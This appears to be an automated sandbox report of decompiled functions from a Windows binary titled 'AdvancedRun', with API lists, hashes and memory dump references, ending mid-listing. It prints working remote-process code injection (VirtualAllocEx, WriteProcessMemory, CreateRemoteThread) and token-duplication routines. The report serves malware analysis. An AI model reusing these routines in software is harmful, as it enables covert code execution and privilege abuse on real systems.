                                                                                                                    • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                    • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                    • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                    0x0040a3d0
                                                                                                                    0x0040a3d9

                                                                                                                    APIs
                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumNamesResource
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3334572018-0
                                                                                                                    • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                    • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                    • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                    • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                    0x00408e38
                                                                                                                    0x00408e44
                                                                                                                    0x00408e56
                                                                                                                    0x00408e68
                                                                                                                    0x00408e7a
                                                                                                                    0x00408e8c
                                                                                                                    0x00408e9e
                                                                                                                    0x00408eb0
                                                                                                                    0x00408ec2
                                                                                                                    0x00408ed4
                                                                                                                    0x00408ee6
                                                                                                                    0x00408ef8
                                                                                                                    0x00408f0a
                                                                                                                    0x00408f1c
                                                                                                                    0x00408f21
                                                                                                                    0x00408f23
                                                                                                                    0x00000000
                                                                                                                    0x00408f28
                                                                                                                    0x00408f29

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                    • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                    • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                    • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                    • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                    • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                    • API String ID: 667068680-4280973841
                                                                                                                    • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                    • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                    • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                    • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                    0x0040a474
                                                                                                                    0x0040a47b
                                                                                                                    0x0040a48a
                                                                                                                    0x0040a48d
                                                                                                                    0x0040a48f
                                                                                                                    0x0040a497
                                                                                                                    0x0040a49a
                                                                                                                    0x0040a6f7
                                                                                                                    0x0040a6f9
                                                                                                                    0x0040a700
                                                                                                                    0x0040a700
                                                                                                                    0x0040a4ad
                                                                                                                    0x0040a4b3
                                                                                                                    0x0040a4b8
                                                                                                                    0x0040a4c6
                                                                                                                    0x0040a4cc
                                                                                                                    0x0040a4cf
                                                                                                                    0x0040a4dd
                                                                                                                    0x0040a4e2
                                                                                                                    0x0040a4e3
                                                                                                                    0x0040a4ea
                                                                                                                    0x0040a4e5
                                                                                                                    0x0040a4e5
                                                                                                                    0x0040a4e5
                                                                                                                    0x0040a4ec
                                                                                                                    0x0040a4f6
                                                                                                                    0x0040a4fe
                                                                                                                    0x0040a503
                                                                                                                    0x0040a504
                                                                                                                    0x0040a50b
                                                                                                                    0x0040a506
                                                                                                                    0x0040a506
                                                                                                                    0x0040a506
                                                                                                                    0x0040a50d
                                                                                                                    0x0040a512
                                                                                                                    0x0040a518
                                                                                                                    0x0040a51c
                                                                                                                    0x0040a523
                                                                                                                    0x0040a523
                                                                                                                    0x0040a523
                                                                                                                    0x0040a528
                                                                                                                    0x0040a537
                                                                                                                    0x0040a54c
                                                                                                                    0x0040a539
                                                                                                                    0x0040a544
                                                                                                                    0x0040a549
                                                                                                                    0x0040a558
                                                                                                                    0x0040a56d
                                                                                                                    0x0040a55a
                                                                                                                    0x0040a565
                                                                                                                    0x0040a56a
                                                                                                                    0x0040a579
                                                                                                                    0x0040a591
                                                                                                                    0x0040a57b
                                                                                                                    0x0040a589
                                                                                                                    0x0040a58e
                                                                                                                    0x0040a5b4
                                                                                                                    0x0040a5b7
                                                                                                                    0x0040a5cc
                                                                                                                    0x0040a5cf
                                                                                                                    0x0040a5d4
                                                                                                                    0x0040a5d7
                                                                                                                    0x0040a6ed
                                                                                                                    0x0040a5e5
                                                                                                                    0x0040a5fa
                                                                                                                    0x0040a60b
                                                                                                                    0x0040a61a
                                                                                                                    0x0040a620
                                                                                                                    0x0040a623
                                                                                                                    0x0040a62b
                                                                                                                    0x0040a62f
                                                                                                                    0x0040a632
                                                                                                                    0x0040a659
                                                                                                                    0x0040a634
                                                                                                                    0x0040a635
                                                                                                                    0x0040a641
                                                                                                                    0x0040a648
                                                                                                                    0x0040a648
                                                                                                                    0x0040a668
                                                                                                                    0x0040a66e
                                                                                                                    0x0040a685
                                                                                                                    0x0040a69e
                                                                                                                    0x0040a6a8
                                                                                                                    0x0040a6ad
                                                                                                                    0x0040a6bd
                                                                                                                    0x0040a6c5
                                                                                                                    0x0040a6c8
                                                                                                                    0x0040a6d0
                                                                                                                    0x0040a6d1
                                                                                                                    0x0040a6d2
                                                                                                                    0x0040a6d3
                                                                                                                    0x0040a6d3
                                                                                                                    0x0040a6c8
                                                                                                                    0x0040a6d7
                                                                                                                    0x0040a6dc
                                                                                                                    0x0040a6dc
                                                                                                                    0x0040a6d7
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                    • memset.MSVCRT ref: 0040A4B3
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                      • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                      • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                      • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                      • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                      • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                      • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                    • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                    • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                    • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                    • memset.MSVCRT ref: 0040A66E
                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                    • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                    • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                    • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                    • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                    • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                    • API String ID: 1572607441-20550370
                                                                                                                    • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                    • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                    • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                    • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                    0x004028a3
                                                                                                                    0x004028ab
                                                                                                                    0x004028bd
                                                                                                                    0x004028ca
                                                                                                                    0x004028d7
                                                                                                                    0x004028e3
                                                                                                                    0x004028e6
                                                                                                                    0x004028e8
                                                                                                                    0x00000000
                                                                                                                    0x004028eb
                                                                                                                    0x004028ec

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                    • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                    • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                    • API String ID: 2238633743-1970996977
                                                                                                                    • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                    • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                    • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                    • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                    0x0040a27d
                                                                                                                    0x0040a286
                                                                                                                    0x0040a290
                                                                                                                    0x0040a29d
                                                                                                                    0x00000000
                                                                                                                    0x0040a32f
                                                                                                                    0x0040a29f
                                                                                                                    0x0040a2a4
                                                                                                                    0x0040a2ad
                                                                                                                    0x0040a2b6
                                                                                                                    0x0040a2bc
                                                                                                                    0x0040a2be
                                                                                                                    0x0040a2c4
                                                                                                                    0x0040a2c8
                                                                                                                    0x0040a2ce
                                                                                                                    0x0040a2e3
                                                                                                                    0x0040a2ed
                                                                                                                    0x0040a2fb
                                                                                                                    0x0040a2fe
                                                                                                                    0x0040a305
                                                                                                                    0x0040a30c
                                                                                                                    0x0040a30f
                                                                                                                    0x0040a313
                                                                                                                    0x00000000
                                                                                                                    0x0040a31a
                                                                                                                    0x0040a338

                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
                                                                                                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                      • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                      • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 283512611-3993045852
                                                                                                                    • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                    • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                    • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                    • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                    0x00401093
                                                                                                                    0x00401096
